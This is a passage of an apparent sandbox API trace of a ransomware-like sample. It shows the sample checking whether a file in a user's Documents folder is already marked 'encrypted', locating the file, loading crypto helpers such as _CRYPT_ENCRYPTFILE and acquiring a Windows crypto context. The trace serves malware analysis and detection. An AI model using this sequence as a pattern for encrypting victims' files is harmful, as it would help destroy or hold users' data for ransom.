dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.957] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.957] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.957] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.957] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.957] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.957] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.957] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.957] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.957] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.957] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca45520, ftCreationTime.dwHighDateTime=0x1d5c4c9, ftLastAccessTime.dwLowDateTime=0x39aa5d90, ftLastAccessTime.dwHighDateTime=0x1d5c27b, ftLastWriteTime.dwLowDateTime=0x39aa5d90, ftLastWriteTime.dwHighDateTime=0x1d5c27b, nFileSizeHigh=0x0, nFileSizeLow=0x127d4, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="bGB2.ods", cAlternateFileName="")) returned 0x7c2240 [0033.957] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.957] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.958] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.958] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.958] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.958] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.958] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.958] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.958] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.958] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.958] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.958] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.958] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.958] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.958] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.958] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0033.958] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.958] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0033.959] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.959] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.959] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.959] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.959] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.959] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.959] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.959] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 